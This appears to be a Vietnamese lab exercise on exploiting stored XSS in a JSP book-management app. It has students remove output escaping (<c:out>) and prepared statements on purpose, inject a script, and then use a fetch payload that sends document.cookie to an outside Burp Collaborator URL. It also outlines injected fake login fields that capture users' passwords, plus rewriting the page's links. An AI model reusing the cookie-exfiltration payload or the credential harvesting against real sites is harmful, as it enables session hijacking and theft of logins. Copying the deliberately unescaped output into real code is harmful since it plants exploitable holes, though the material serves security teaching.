KHAI THÁC LỖ HỔNG STORED XSS:

1. Sửa code chức năng them mới sách, để có thể nhập đoạn mã sau vào ô textbox:
script>alert("XSS attack!");</script>

sau khi mở danh sách cuốn sách, đoạn mã trên được kích hoạt

Sửa code:
 Ko dùng preparedstatement
 Ko dùng thẻ <c:out> thay bằng dùng trực tiếp JSP EL
<c:out value='${book.id}' />

Chuyển thành:

${book.id}

2. Dùng đoạn mã JS sau để lấy thông tin cookie và gửi về một trang Wait.jsp đang đợi (xem
bài thực hành Dom Based XSS) >> Nhiều trình duyệt đã ko cho thực hiện lệnh
document.cookie
3. <script>
4. const collaboratorPayload =
5. 'https://8nwt4pscq72lffvjuamlfulvtmzcn1.burpcollaborator.net';
6. const url = `${collaboratorPayload}?abc=${document.cookie}`;
7. fetch(url, {
8. method: 'GET',
9. mode: 'no-cors',
10. });
11. </script>

3. Tạo ra 1 input text để nhập username và input text để nhập password, đợi cho 1 stupid
user nào đó nhập username và password của họ vào và khi xong xuôi thì hacker sẽ nhận
được đầy đủ thông tin đăng nhập của người dùng

4. Thực hiện đổi ảnh background trang web

5. Thực hiện đổi href của tất cả đường link trong trang